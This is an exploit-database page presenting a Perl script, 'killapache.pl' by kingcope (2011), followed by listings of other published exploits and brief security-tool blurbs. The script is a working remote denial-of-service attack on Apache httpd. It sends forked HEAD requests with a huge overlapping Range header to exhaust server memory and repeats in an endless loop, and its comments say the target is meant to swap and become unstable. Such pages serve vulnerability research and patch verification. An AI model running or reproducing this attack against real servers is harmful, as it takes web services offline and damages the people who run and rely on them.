Menu

Search for hundreds of thousands of exploits

"Apache - Remote Memory Exhaustion (Denial of Service)"

Author

Exploit author

kingcope

Platform

Exploit platform

multiple

Release date

Exploit published date

2011-08-19

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
#Apache httpd Remote Denial of Service (memory exhaustion)
#By Kingcope
#Year 2011
#
# Will result in swapping memory to filesystem on the remote side
# plus killing of processes when running out of swap space.
# Remote System becomes unstable.
#

use IO::Socket;
use Parallel::ForkManager;

sub usage {
	print "Apache Remote Denial of Service (memory exhaustion)\n";
	print "by Kingcope\n";
	print "usage: perl killapache.pl <host> [numforks]\n";
	print "example: perl killapache.pl www.example.com 50\n";
}

sub killapache {
print "ATTACKING $ARGV[0] [using $numforks forks]\n";
	
$pm = new Parallel::ForkManager($numforks);

$|=1;
srand(time());
$p = "";
for ($k=0;$k<1300;$k++) {
	$p .= ",5-$k";
}

for ($k=0;$k<$numforks;$k++) {
my $pid = $pm->start and next; 	
	
$x = "";
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                 PeerPort => "80",
                     			 Proto    => 'tcp');

$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
print $sock $p;

while(<$sock>) {
}
 $pm->finish;
}
$pm->wait_all_children;
print ":pPpPpppPpPPppPpppPp\n";
}

sub testapache {
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                 PeerPort => "80",
                     			 Proto    => 'tcp');

$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
print $sock $p;

$x = <$sock>;
if ($x =~ /Partial/) {
	print "host seems vuln\n";
	return 1;	
} else {
	return 0;	
}
}

if ($#ARGV < 0) {
	usage;
	exit;	
}

if ($#ARGV > 1) {
	$numforks = $ARGV[1];
} else {$numforks = 50;}

$v = testapache();
if ($v == 0) {
	print "Host does not seem vulnerable\n";
	exit;	
}
while(1) {
killapache();
}
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Expense Management System - 'description' Stored Cross Site Scripting" webapps multiple "Nikhil Kumar"
2020-12-02 "Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting" webapps multiple "Parshwa Bhavsar"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Under Construction Page with CPanel 1.0 - SQL injection" webapps multiple "Mayur Parmar"
Release Date Title Type Platform Author
2013-10-29 "Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution" remote php kingcope
2013-09-03 "MikroTik RouterOS - sshd (ROSSSH) Remote Heap Corruption" remote hardware kingcope
2013-08-07 "Apache suEXEC - Information Disclosure / Privilege Escalation" remote linux kingcope
2013-07-16 "Squid 3.3.5 - Denial of Service (PoC)" dos linux kingcope
2013-07-11 "Nginx 1.3.9/1.4.0 (x86) - Brute Force" remote linux_x86 kingcope
2013-06-05 "Plesk < 9.5.4 - Remote Command Execution" remote php kingcope
2013-04-12 "ircd-hybrid 8.0.5 - Denial of Service" dos linux kingcope
2012-12-06 "Oracle MySQL / MariaDB - Insecure Salt Generation Security Bypass" remote linux kingcope
2012-12-02 "MySQL 5.1/5.5 (Windows) - 'MySQLJackpot' Remote Command Execution" remote windows kingcope
2012-12-02 "MySQL (Linux) - Heap Overrun (PoC)" dos linux kingcope
2012-12-02 "IBM System Director Agent - Remote System Level" remote windows kingcope
2012-12-02 "freeFTPd 1.2.6 - Remote Authentication Bypass" remote windows kingcope
2012-12-02 "MySQL - Denial of Service (PoC)" dos linux kingcope
2012-12-02 "MySQL (Linux) - Stack Buffer Overrun (PoC)" dos linux kingcope
2012-12-02 "MySQL (Linux) - Database Privilege Escalation" local linux kingcope
2012-12-02 "(SSH.com Communications) SSH Tectia (SSH < 2.0-6.1.9.95 / Tectia 6.1.9.95) - Remote Authentication Bypass" remote linux kingcope
2012-12-02 "MySQL - 'Stuxnet Technique' Windows Remote System" remote windows kingcope
2012-12-02 "freeSSHd 2.1.3 - Remote Authentication Bypass" remote windows kingcope
2012-12-02 "MySQL - Remote User Enumeration" remote multiple kingcope
2012-08-13 "Pure-FTPd 1.0.21 (CentOS 6.2 / Ubuntu 8.04) - Null Pointer Dereference Crash (PoC)" dos linux kingcope
2012-07-01 "BSD - 'TelnetD' Remote Command Execution (2)" remote bsd kingcope
2012-06-10 "Microsoft IIS 6.0/7.5 (+ PHP) - Multiple Vulnerabilities" remote windows kingcope
2012-03-19 "Apache Tomcat - Account Scanner / 'PUT' Request Command Execution" remote multiple kingcope
2012-01-17 "Linux Kernel 2.6.36 IGMP - Remote Denial of Service" dos linux kingcope
2011-12-01 "FreeBSD - 'ftpd / ProFTPd' Remote Command Execution" remote freebsd kingcope
2011-12-01 "Serv-U FTP Server - Jail Break" remote windows kingcope
2011-10-11 "JBoss AS 2.0 - Remote Command Execution" remote windows kingcope
2011-08-19 "Apache - Remote Memory Exhaustion (Denial of Service)" dos multiple kingcope
2011-06-30 "FreeBSD OpenSSH 3.5p1 - Remote Command Execution" remote freebsd kingcope
2011-03-04 "JBoss Application Server 4.2 < 4.2.0.CP09 / 4.3 < 4.3.0.CP08 - Remote Command Execution" webapps jsp kingcope 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected